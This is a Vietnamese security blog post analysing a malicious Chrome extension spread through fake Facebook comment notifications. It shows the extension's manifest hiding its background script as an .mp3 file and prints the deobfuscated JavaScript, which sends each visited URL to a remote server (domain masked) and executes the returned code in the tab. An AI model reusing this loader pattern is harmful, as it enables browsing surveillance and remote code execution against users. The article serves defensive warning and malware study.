• Tin tức
    • Bản tin an ninh mạng
    • Lỗ hổng
    • Malware
    • Tấn công mạng
  • Kiến thức
    • Bảo mật hệ thống
    • Bảo mật phần cứng
    • Bảo mật ứng dụng
    • Digital Forensics
    • Mã độc
    • Mật mã
  • Hướng dẫn
  • Giải pháp
  • Cộng đồng
TÌM KIẾM
Đăng ký   /
Đăng nhập
SecurityDaily
  • Tin tức
    • Tất cảBản tin an ninh mạngLỗ hổngMalwareTấn công mạng
      team5

      Tin tặc LuoYu của Trung Quốc sử dụng các cuộc tấn công Man-on-the-Side…

      conti ransomware

      Thông tin bị rò rỉ của Conti tiết lộ sự quan tâm của băng nhóm Ransomw…

      Công cụ YODA Đã tìm thấy khoảng 47.000 Plugin WordPress độc hại được c…

      Server Discord của Bored Ape Yacht Club đã bị tấn công. Trách nhiệm nê…

  • Kiến thức
    • Tất cảBảo mật hệ thốngBảo mật phần cứngBảo mật ứng dụngDigital ForensicsMã độcMật mã
      software security

      Mối đe dọa tiếp diễn của các lỗ hổng bảo mật chưa được khắc phục

      ASM đóng vai trò như thế nào trong an ninh mạng?

      Khả năng hiển thị mối đe dọa – nơi bắt đầu của bảo vệ an ninh mạ…

      iot malware

      Phát hiện mã độc trên các thiết bị IoT bằng phương pháp phát xạ điện t…

  • Hướng dẫn
  • Giải pháp
  • Cộng đồng

Phân tích mã độc mới lây lan trên Facebook – Phần 1

Mạnh Tuấn
Hướng dẫn-Cộng đồng- 16/11/2015
Hôm nay trên Facebook mọi người chia sẻ rất nhiều cảnh báo về một kiểu Hack tài khoản Facebook mới có dạng ai đó “đã nhắc đến bạn trong một bình luận“. Trong bài này tôi sẽ phân tích cách mà mã độc này đang hoạt động và lây lan.

ma-doc-hack-facebook-01

Ở thời điểm hiện tại, khi nhấn vào thông báo thì bạn sẽ nhận được cảnh báo từ Facebook:

ma-doc-hack-facebook-02

Để có thể viết bài phân tích cho các bạn, tôi sẽ nhấn vào `Truy cập liên kết`. Tuy nhiên các bạn hãy vào `Quay lại` để đảm bảo an toàn cho bản thân! Sau khi nhấn vào thông báo, thay vì chuyển hướng tới bình luận như mọi khi thì người dùng sẽ bị chuyển hướng sang một trang web có giao diện giống hệt Facebook. Dù đây là tấn công theo phương thức [Phishing](https://en.wikipedia.org/wiki/Phishing) nhưng không phải kiểu thông thường mà chúng ta thường gặp là nhái trang đăng nhập. Lần này nó sẽ hiển thị một trang xem video như trên Facebook.

ma-doc-hack-facebook-03

Sau khi truy cập khoảng 5 giây sẽ có một thông báo yêu cầu cài đặt Extension vào trình duyệt. Tại sao trang web có thể hiển thị thông báo như khi bạn nhấn nút cài đặt Extension trên Chrome Store? Đó là vì kẻ tấn công đã sử dụng phương thức **Cài đặt nội tuyến** ([Inline Installation]). Tất nhiên là tôi sẽ không cài đặt rồi. Bằng một số thủ thuật tìm thấy trên Google, tôi tải được tập tin CRX (đuôi mở rộng của Extension) về máy.

Phân tích mã độc

CRX thực chất là một định dạng nén đặc biệt của Extension, giống như đuôi JAR của tập tin JAVA. Tức là ta có thể xem nội dung bên trong như một tập tin nén thông thường.

Mã độc Facebook

Trong phần mở rộng này có một tập tin khá đặc biệt là **639040963078.mp3** (tập tin MP3 rất ít khi được sử dụng trong Extension). Quét thử với Virus Total thì [kết quả](https://www.virustotal.com/vi/file/68fe8daa29e8e618250e1fe28c5725f8d92a8a57d44932799f4f6628a4c01788/analysis/1447594203/) có vẻ cũng không “nguy hiểm” lắm. Tôi liền mở tập tin manifest.json ra coi. Đây là tập tin chứa các thông tin cơ bản và quyền hạn của một Extension.

Mã độc lây lan trên Facebook

Phần quyền hạn (permission) có vẻ khá nhạy cảm. Nó quản lý các tab và mọi trang web mà bạn truy cập (kể cả trang web đó sử dụng giao thức bảo mật HTTPS). Nhưng có một điểm thú vị hơn là phần kịch bản chạy nền (background):
“`json “background”:{ “scripts”:[“639040963078.mp3”] } “`
Tại sao tôi lại nói là thú vị? Vì phần này khai báo HTML hoặc JavaScript nhưng tác giả của Extension lại trỏ vào tập tin *.mp3 Tôi liền đổi đuôi tập tin 639040963078**.mp3** thành 639040963078**.js** và mở lên xem nội dung.

Mã độc lây lan trên Facebook

Đoạn mã đã được làm rối (Obfuscated), tuy nhiên mã khá ngắn nên không tốn nhiều thời gian lắm để lấy lại đoạn mã ban đầu:
“`javascript window.chrome.tabs.onUpdated.addListener(function(wyqhrr) { window.chrome.tabs.get(wyqhrr, function(tab) { if (tab.status == ‘complete’) { var xhr = new XMLHttpRequest(); xhr.open(‘GET’, ‘http://xxx.xyz/z.php?url=’ + tab.url, true); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { window.chrome.tabs.executeScript(tab.id, { code: xhr.responseText }); } } xhr.send(); } }) }) “`
*Chú ý: Tên miền trong đoạn mã chứa mã độc nên tôi đã ẩn.* Đoạn mã trên sẽ lắng nghe sự kiện mỗi khi người dùng mở tab mới hoặc tab được điều hướng. Khi sự kiện này xảy ra nó sẽ thực thi một đoạn mã độc từ xa. Nội dung mã độc mới được lấy thông qua Ajax. Bài phân tích khá dài. Tôi sẽ tiếp tục phân tích đoạn mã độc được thực thi trong phần 2.
  • #Cảnh báo
  • #Bài phân tích hay
  • #Mã độc
  • #Facebook
  • #Mạng xã hội
Mạnh Tuấn
Tôi là trưởng nhóm J2TeaM. Lĩnh vực nghiên cứu chính: Web Security, Web Application Pentest. Tôi cũng tìm hiểu về Facebook Security, Malware Analysis.

BÀI VIẾT LIÊN QUANXEM THÊM

antivirus

Tin tặc Trung Quốc bị phát hiện khai thác các sản phẩm antivirus phổ b...

delete

Trình xóa dữ liệu mới thứ hai “IssacWiper” nhắm vào Ukrain...

facebook instagram encryption

Facebook trì hoãn triển khai mã hóa đầu cuối cho Messenger và Instagra...

BÌNH LUẬN Hủy trả lời

đăng nhập để lại một bình luận

Bài viết nổi bật
team5

Tin tặc LuoYu của Trung Quốc sử dụng các cuộc tấn công Man-o...

Tấn công mạng - 15/06/2022
conti ransomware

Thông tin bị rò rỉ của Conti tiết lộ sự quan tâm của băng nh...

Tấn công mạng - 13/06/2022

Công cụ YODA Đã tìm thấy khoảng 47.000 Plugin WordPress độc ...

Lỗ hổng - 10/06/2022

    Nhận những bài viết mới nhất từ SecurityDaily

    Các bài viết cùng Series

    • Phân tích mã độc mới lây lan trên Facebook – Phần 1
    • Cảnh báo mã độc tự động share, like và spam trên Facebook
    • Phân tích và hướng dẫn loại bỏ mã độc “Vẽ Chibi” trên Facebook – phần 2
    • Bảo mật Facebook – Làm sao để giữ tài khoản của bạn an toàn?
    • Nguy cơ từ các đường dẫn giả mạo chia sẻ trên Facebook
    • Cẩn thận với những liên kết được chia sẻ trên Facebook
    • Cảnh báo lừa đảo mới đang được phát tán trên Facebook
    • Nhận biết và xử lý khi nhận được email lừa đảo
    • Cách khắc phục và đề phòng tự động tag trên Facebook

    Trang tin tức, cảnh báo và phân tích chuyên sâu về an ninh mạng.
    Mọi thắc mắc liên hệ: contact@securitydaily.net
    Tải nội dung trên Google Play Tải nội dung trên App Store
    • Facebook Page
    • Facebook Group
    • Giới thiệu
    Copyright © 2018 SecurityDaily. All rights reserved.

    Cảm ơn bạn vì đã đăng ký!

    Đừng quên kiểm tra hòm thư của mình thường xuyên
    để không bỏ lỡ các bài viết tin tức và kiến thức mới nhất từ SecurityDaily nhé!

      Nhận các cảnh báo bảo mật cùng +20.000 thành viên

      Đăng ký nhận tin từ CyStack Resource

      Cảm ơn bạn

      Cảm ơn bạn đã đăng ký theo dõi.

      Edit with Live CSS
      Save
      Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.